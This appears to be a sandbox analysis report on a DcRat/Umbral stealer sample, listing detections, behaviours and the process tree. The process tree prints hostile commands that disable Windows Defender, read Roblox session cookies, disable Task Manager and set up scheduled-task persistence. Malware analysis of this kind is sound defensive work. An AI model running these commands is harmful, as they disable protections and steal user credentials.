Analysis
-
max time kernel
149s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
04-05-2024 01:35
Static task
static1
Behavioral task
behavioral1
Sample
a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe
Resource
win7-20240221-en
General
-
Target
a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe
-
Size
4.3MB
-
MD5
898a94f29edc228ce3bd2054f3d5d6dd
-
SHA1
f2b5d32ca5520f35a738ef1ccbbf5fb2160bfbc5
-
SHA256
a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37
-
SHA512
8a7ee18864b118bd165b9f97aad3d188cd51985180feedf5c32c2f5acd6d427f05b7e6077a9c0c405bd152a203086203aa306db802e13f917c04040c4b789eae
-
SSDEEP
49152:ENPuAcWILneTm53Oln3Gl1iy92HEs/sFZ583oMLmUZ8hXyaSvgIsR1SB:ENP0WILeTm5+l2lb40r5837L8iVvIvQ
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Umbral payload 3 IoCs
resource yara_rule behavioral2/memory/2904-0-0x0000000000400000-0x000000000084E000-memory.dmp family_umbral behavioral2/files/0x000c000000023b5b-5.dat family_umbral behavioral2/memory/4440-65-0x000002423EB90000-0x000002423EBD0000-memory.dmp family_umbral -
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1156 3464 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4792 3464 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1544 3464 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3376 3464 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2092 3464 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 224 3464 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2908 3464 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3008 3464 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1980 3464 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 772 3464 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2412 3464 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3316 3464 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2420 3464 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2368 3464 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5000 3464 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3860 3464 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2392 3464 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5068 3464 schtasks.exe 91 -
resource yara_rule behavioral2/memory/2904-0-0x0000000000400000-0x000000000084E000-memory.dmp dcrat behavioral2/files/0x000a000000023bb7-66.dat dcrat behavioral2/files/0x000a000000023bba-223.dat dcrat behavioral2/memory/624-225-0x0000000000EC0000-0x000000000110A000-memory.dmp dcrat -
Detects executables attemping to enumerate video devices using WMI 3 IoCs
resource yara_rule behavioral2/memory/2904-0-0x0000000000400000-0x000000000084E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice behavioral2/files/0x000c000000023b5b-5.dat INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice behavioral2/memory/4440-65-0x000002423EB90000-0x000002423EBD0000-memory.dmp INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice -
Detects executables containing possible sandbox analysis VM names 3 IoCs
resource yara_rule behavioral2/memory/2904-0-0x0000000000400000-0x000000000084E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxComputerNames behavioral2/files/0x000c000000023b5b-5.dat INDICATOR_SUSPICIOUS_EXE_SandboxComputerNames behavioral2/memory/4440-65-0x000002423EB90000-0x000002423EBD0000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxComputerNames -
Detects executables containing possible sandbox analysis VM usernames 3 IoCs
resource yara_rule behavioral2/memory/2904-0-0x0000000000400000-0x000000000084E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxUserNames behavioral2/files/0x000c000000023b5b-5.dat INDICATOR_SUSPICIOUS_EXE_SandboxUserNames behavioral2/memory/4440-65-0x000002423EB90000-0x000002423EBD0000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxUserNames -
Detects executables containing possible sandbox system UUIDs 3 IoCs
resource yara_rule behavioral2/memory/2904-0-0x0000000000400000-0x000000000084E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxSystemUUIDs behavioral2/files/0x000c000000023b5b-5.dat INDICATOR_SUSPICIOUS_EXE_SandboxSystemUUIDs behavioral2/memory/4440-65-0x000002423EB90000-0x000002423EBD0000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxSystemUUIDs -
Detects executables packed with SmartAssembly 3 IoCs
resource yara_rule behavioral2/memory/624-232-0x000000001C2D0000-0x000000001C2DC000-memory.dmp INDICATOR_EXE_Packed_SmartAssembly behavioral2/memory/624-237-0x000000001C520000-0x000000001C52A000-memory.dmp INDICATOR_EXE_Packed_SmartAssembly behavioral2/memory/624-234-0x000000001C3E0000-0x000000001C3EA000-memory.dmp INDICATOR_EXE_Packed_SmartAssembly -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 468 powershell.exe -
Disables Task Manager via registry modification
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts stealer.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation чекер dc.exe Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation driverBrokercommon.exe Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation csrss.exe Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe -
Executes dropped EXE 5 IoCs
pid Process 4440 stealer.exe 4468 чекер dc.exe 2808 Inject.exe 624 driverBrokercommon.exe 4688 csrss.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 22 discord.com 23 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 ip-api.com -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Common Files\Adobe\Acrobat\conhost.exe driverBrokercommon.exe File created C:\Program Files (x86)\Common Files\Adobe\Acrobat\088424020bedd6 driverBrokercommon.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\SystemResources\Windows.UI.ShellCommonInetCore\SearchApp.exe driverBrokercommon.exe File created C:\Windows\SystemResources\Windows.UI.ShellCommonInetCore\38384e6a620884 driverBrokercommon.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1156 schtasks.exe 1544 schtasks.exe 3008 schtasks.exe 2420 schtasks.exe 2392 schtasks.exe 5068 schtasks.exe 4792 schtasks.exe 2908 schtasks.exe 3376 schtasks.exe 224 schtasks.exe 772 schtasks.exe 3316 schtasks.exe 5000 schtasks.exe 3860 schtasks.exe 2092 schtasks.exe 1980 schtasks.exe 2412 schtasks.exe 2368 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3916 wmic.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings чекер dc.exe Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings driverBrokercommon.exe Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings csrss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4744 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3288 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4440 stealer.exe 468 powershell.exe 468 powershell.exe 5108 powershell.exe 5108 powershell.exe 4592 powershell.exe 4592 powershell.exe 3116 powershell.exe 3116 powershell.exe 3404 powershell.exe 3404 powershell.exe 3404 powershell.exe 624 driverBrokercommon.exe 624 driverBrokercommon.exe 624 driverBrokercommon.exe 624 driverBrokercommon.exe 624 driverBrokercommon.exe 624 driverBrokercommon.exe 624 driverBrokercommon.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe 4688 csrss.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4688 csrss.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4440 stealer.exe Token: SeIncreaseQuotaPrivilege 1380 wmic.exe Token: SeSecurityPrivilege 1380 wmic.exe Token: SeTakeOwnershipPrivilege 1380 wmic.exe Token: SeLoadDriverPrivilege 1380 wmic.exe Token: SeSystemProfilePrivilege 1380 wmic.exe Token: SeSystemtimePrivilege 1380 wmic.exe Token: SeProfSingleProcessPrivilege 1380 wmic.exe Token: SeIncBasePriorityPrivilege 1380 wmic.exe Token: SeCreatePagefilePrivilege 1380 wmic.exe Token: SeBackupPrivilege 1380 wmic.exe Token: SeRestorePrivilege 1380 wmic.exe Token: SeShutdownPrivilege 1380 wmic.exe Token: SeDebugPrivilege 1380 wmic.exe Token: SeSystemEnvironmentPrivilege 1380 wmic.exe Token: SeRemoteShutdownPrivilege 1380 wmic.exe Token: SeUndockPrivilege 1380 wmic.exe Token: SeManageVolumePrivilege 1380 wmic.exe Token: 33 1380 wmic.exe Token: 34 1380 wmic.exe Token: 35 1380 wmic.exe Token: 36 1380 wmic.exe Token: SeIncreaseQuotaPrivilege 1380 wmic.exe Token: SeSecurityPrivilege 1380 wmic.exe Token: SeTakeOwnershipPrivilege 1380 wmic.exe Token: SeLoadDriverPrivilege 1380 wmic.exe Token: SeSystemProfilePrivilege 1380 wmic.exe Token: SeSystemtimePrivilege 1380 wmic.exe Token: SeProfSingleProcessPrivilege 1380 wmic.exe Token: SeIncBasePriorityPrivilege 1380 wmic.exe Token: SeCreatePagefilePrivilege 1380 wmic.exe Token: SeBackupPrivilege 1380 wmic.exe Token: SeRestorePrivilege 1380 wmic.exe Token: SeShutdownPrivilege 1380 wmic.exe Token: SeDebugPrivilege 1380 wmic.exe Token: SeSystemEnvironmentPrivilege 1380 wmic.exe Token: SeRemoteShutdownPrivilege 1380 wmic.exe Token: SeUndockPrivilege 1380 wmic.exe Token: SeManageVolumePrivilege 1380 wmic.exe Token: 33 1380 wmic.exe Token: 34 1380 wmic.exe Token: 35 1380 wmic.exe Token: 36 1380 wmic.exe Token: SeDebugPrivilege 468 powershell.exe Token: SeDebugPrivilege 5108 powershell.exe Token: SeDebugPrivilege 4592 powershell.exe Token: SeDebugPrivilege 3116 powershell.exe Token: SeIncreaseQuotaPrivilege 3480 wmic.exe Token: SeSecurityPrivilege 3480 wmic.exe Token: SeTakeOwnershipPrivilege 3480 wmic.exe Token: SeLoadDriverPrivilege 3480 wmic.exe Token: SeSystemProfilePrivilege 3480 wmic.exe Token: SeSystemtimePrivilege 3480 wmic.exe Token: SeProfSingleProcessPrivilege 3480 wmic.exe Token: SeIncBasePriorityPrivilege 3480 wmic.exe Token: SeCreatePagefilePrivilege 3480 wmic.exe Token: SeBackupPrivilege 3480 wmic.exe Token: SeRestorePrivilege 3480 wmic.exe Token: SeShutdownPrivilege 3480 wmic.exe Token: SeDebugPrivilege 3480 wmic.exe Token: SeSystemEnvironmentPrivilege 3480 wmic.exe Token: SeRemoteShutdownPrivilege 3480 wmic.exe Token: SeUndockPrivilege 3480 wmic.exe Token: SeManageVolumePrivilege 3480 wmic.exe -
Suspicious use of WriteProcessMemory 54 IoCs
description pid Process procid_target PID 2904 wrote to memory of 4440 2904 a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe 84 PID 2904 wrote to memory of 4440 2904 a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe 84 PID 2904 wrote to memory of 4468 2904 a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe 85 PID 2904 wrote to memory of 4468 2904 a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe 85 PID 2904 wrote to memory of 4468 2904 a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe 85 PID 2904 wrote to memory of 2808 2904 a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe 86 PID 2904 wrote to memory of 2808 2904 a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe 86 PID 4440 wrote to memory of 1380 4440 stealer.exe 88 PID 4440 wrote to memory of 1380 4440 stealer.exe 88 PID 4468 wrote to memory of 4532 4468 чекер dc.exe 92 PID 4468 wrote to memory of 4532 4468 чекер dc.exe 92 PID 4468 wrote to memory of 4532 4468 чекер dc.exe 92 PID 4440 wrote to memory of 1324 4440 stealer.exe 94 PID 4440 wrote to memory of 1324 4440 stealer.exe 94 PID 4440 wrote to memory of 468 4440 stealer.exe 96 PID 4440 wrote to memory of 468 4440 stealer.exe 96 PID 4440 wrote to memory of 5108 4440 stealer.exe 99 PID 4440 wrote to memory of 5108 4440 stealer.exe 99 PID 4440 wrote to memory of 4592 4440 stealer.exe 102 PID 4440 wrote to memory of 4592 4440 stealer.exe 102 PID 4440 wrote to memory of 3116 4440 stealer.exe 105 PID 4440 wrote to memory of 3116 4440 stealer.exe 105 PID 4440 wrote to memory of 3480 4440 stealer.exe 107 PID 4440 wrote to memory of 3480 4440 stealer.exe 107 PID 4440 wrote to memory of 4824 4440 stealer.exe 109 PID 4440 wrote to memory of 4824 4440 stealer.exe 109 PID 4440 wrote to memory of 4124 4440 stealer.exe 112 PID 4440 wrote to memory of 4124 4440 stealer.exe 112 PID 4440 wrote to memory of 3404 4440 stealer.exe 114 PID 4440 wrote to memory of 3404 4440 stealer.exe 114 PID 4440 wrote to memory of 3916 4440 stealer.exe 116 PID 4440 wrote to memory of 3916 4440 stealer.exe 116 PID 4440 wrote to memory of 2940 4440 stealer.exe 118 PID 4440 wrote to memory of 2940 4440 stealer.exe 118 PID 2940 wrote to memory of 3288 2940 cmd.exe 120 PID 2940 wrote to memory of 3288 2940 cmd.exe 120 PID 4532 wrote to memory of 4900 4532 WScript.exe 121 PID 4532 wrote to memory of 4900 4532 WScript.exe 121 PID 4532 wrote to memory of 4900 4532 WScript.exe 121 PID 4900 wrote to memory of 624 4900 cmd.exe 123 PID 4900 wrote to memory of 624 4900 cmd.exe 123 PID 624 wrote to memory of 3252 624 driverBrokercommon.exe 142 PID 624 wrote to memory of 3252 624 driverBrokercommon.exe 142 PID 4900 wrote to memory of 4744 4900 cmd.exe 144 PID 4900 wrote to memory of 4744 4900 cmd.exe 144 PID 4900 wrote to memory of 4744 4900 cmd.exe 144 PID 3252 wrote to memory of 3080 3252 cmd.exe 145 PID 3252 wrote to memory of 3080 3252 cmd.exe 145 PID 3252 wrote to memory of 4688 3252 cmd.exe 151 PID 3252 wrote to memory of 4688 3252 cmd.exe 151 PID 4688 wrote to memory of 1956 4688 csrss.exe 152 PID 4688 wrote to memory of 1956 4688 csrss.exe 152 PID 4688 wrote to memory of 2996 4688 csrss.exe 153 PID 4688 wrote to memory of 2996 4688 csrss.exe 153 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1324 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe"C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Users\Admin\AppData\Local\Temp\stealer.exe"C:\Users\Admin\AppData\Local\Temp\stealer.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\stealer.exe"3⤵
- Views/modifies file attributes
PID:1324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stealer.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:468
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3116
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3480
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:4824
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:4124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3404
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:3916
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\stealer.exe" && pause3⤵
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:3288
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\MsWinsessiondllNet\driverBrokercommon.exe"C:\MsWinsessiondllNet\driverBrokercommon.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zv5EjZvQwa.bat"6⤵
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:3080
-
-
C:\MsWinsessiondllNet\csrss.exe"C:\MsWinsessiondllNet\csrss.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9fce6a35-a5d7-4e31-8567-7bee8400eb5e.vbs"8⤵PID:1956
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9802ccd6-4030-46fb-b238-ffcfa505b77a.vbs"8⤵PID:2996
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f5⤵
- Modifies registry key
PID:4744
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Inject.exe"C:\Users\Admin\AppData\Local\Temp\Inject.exe"2⤵
- Executes dropped EXE
PID:2808
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Links\System.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1156
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Admin\Links\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4792
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Links\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1544
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3376
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2092
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:224
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2908
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3008
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1980
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\MsWinsessiondllNet\unsecapp.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:772
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2412
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\MsWinsessiondllNet\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3316
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Common Files\Adobe\Acrobat\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2420
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Adobe\Acrobat\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2368
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\Adobe\Acrobat\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5000
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 5 /tr "'C:\Windows\SystemResources\Windows.UI.ShellCommonInetCore\SearchApp.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3860
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\SystemResources\Windows.UI.ShellCommonInetCore\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2392
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\Windows\SystemResources\Windows.UI.ShellCommonInetCore\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5068
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.3MB
MD5d84e590c3715c79dc5b92c435957d162
SHA12901580903e4b356448d9fe7bea510261e655363
SHA256d81c1097d231fdcb536974ef025f230d1c4091bab3edcf4f9da9344b44b638ba
SHA512b797cdb43776a7e8a19f9c93299857d8f88651e13c7ba5ddb57f0ac0b24c7b98e6cc6c20ae1561948fb49774edad31cd237f40c9c690d34923ffee56bc02a485
-
Filesize
158B
MD5ea70d7b0f1a8a1ff2d246efbdcfe1001
SHA1252e762aee8fcc5761e17bb84aa3af8276852f5c
SHA2561947411b5329e6db696c2354b56290b82aaf58b5f5d75fd4f3315fbe27999e31
SHA5121fd28c415177644e069ded3e0ab3d27105fdac2d76f1060abb127e1961f310c81559e4c1213e61a7f32583cee9f4560106cafc88f0f20cf470edb756aadbec86
-
Filesize
218B
